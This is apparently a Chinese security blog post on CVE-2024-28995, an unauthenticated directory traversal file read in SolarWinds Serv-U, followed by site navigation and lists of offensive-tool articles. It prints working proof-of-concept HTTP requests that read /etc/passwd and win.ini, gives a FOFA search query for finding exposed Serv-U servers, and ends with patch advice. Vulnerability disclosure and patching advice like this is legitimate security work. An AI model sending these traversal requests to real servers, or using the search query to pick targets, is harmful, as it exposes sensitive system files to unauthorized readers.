首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

CVE-2024-28995:SolarWinds Serv-U FTP目录遍历文件读取

文摘   2024-08-05 07:00   四川  

影响范围

SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1  

SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1  

SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1

漏洞概述

SolarWinds是一家提供广泛的IT管理和网络管理软件解决方案的公司,SolarWinds的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-U是SolarWinds提供的一款FTP(文件传输协议)服务器软件,2024年6月官方发布安全更新修复了CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,从而造成敏感信息泄漏

漏洞复现

应用主界面如下所示:

Linux平台利用POC:

GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

Windows平台:

GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1Host: xx.xxx.xxx.xxxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive

目标检索

FOFA:

server="Serv-U"

安全建议

目前官方已有可更新版本(https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Releas  e-Notes),建议Serv-U用户尽快应用此修补程序

  • SolarWinds Serv-U FTP Server >= 15.4.2 Hotfix 2  

  • SolarWinds Serv-U Gateway >= 15.4.2 Hotfix 2  

  • SolarWinds Serv-U MFT Server >= 15.4.2 Hotfix 2


·推 荐 阅 读·

最新后渗透免杀工具

【护网必备】高危漏洞综合利用工具

   【护网必备】Shiro反序列化漏洞综合利用工具增强版

【护网必备】外网打点必备-WeblogicTool

护网必备】最新Struts2全版本漏洞检测工具

Nacos漏洞综合利用工具

重点OA系统漏洞利用综合工具箱  

【护网必备】海康威视RCE批量检测利用工具

【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具


横向移动之RDP&Desktop Session Hija

 http://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247492787&idx=2&sn=39c9d4fc094700424e78e1fbcb535e7c
七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
 最新文章
JAVA安全之FreeMark模板注入刨析
【K8s安全】集群信息收集一篇通
JAVA安全之Thymeleaf模板注入检测再探
JumpServer堡垒机漏洞利用工具集
WebSocket攻防对抗概览
JRMP通信攻击过程及利用介绍
JAVA安全之Thymeleaf模板注入防护绕过
【免杀对抗】基于PE Patch技术的后渗透免杀工具
JAVA安全之Velocity模板注入刨析
使用bladeRF进行GPS欺骗
RDP连接多开方法与利用思路
【漏洞扫描】Spring框架的漏洞扫描​
Adobe Flash Player社工钓鱼
【蓝队福利】D-eyes木马查杀与微步的一次巧妙结合
【免杀工具】手动/自动patch shellcode到二进制文件的免杀工具
Windows凭证钓鱼方式面面观
WordPress检测工具使用指南
内网渗透之内网权限维持
【护网必备】JumpServer堡垒机利用工具集
【免杀对抗】无可执行权限加载ShellCode
WMIHACKER:免杀横向移动命令执行测试工具
【免杀对抗】基于PE Patch技术的后渗透免杀工具
内网渗透之从域用户到企业管理源用户
【最新免杀手法】针对PE文件的分离免杀对抗工具
从网络配置文件中提取PEAP凭据
程序源码保护攻防对抗录
OA-EXPTOOL漏洞综合利用框架
记URL重定向漏洞骚技巧
Swagger接口安全测试评估
基于Windows权限维持总结
对某根域的一次渗透测试
【护网必备】针对加解密综合利用后渗透工具
海康威视命令执行简单分析
白加黑保姆教程通杀主流杀软
帆软/view/ReportServer 远程代码执行漏洞分析
【漏洞利用】最新大华综合漏洞利用工具
【护网必备】通达OA漏洞综合利用工具
NoSQL Injection攻防面面观
FastJson1&FastJson2反序列化利用链分析
CVE-2024-28995:SolarWinds Serv-U FTP目录遍历文件读取
负载均衡下的Webshell连接处理
一种后渗透阶段权限维持方法
【护网漏洞】用友NC-Cloud 远程命令执行
NoWAFPls插件:通过一键插入垃圾数据过WAF
【护网漏洞】亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入漏洞
WireShark数据对象导出分析方法
【护网漏洞】福建科立讯通信指挥调度管理平台任意文件上传
新型远程注入手法-Threadless inject
【护网漏洞】天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取
WMIHACKER:免杀横向移动命令执行测试工具
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉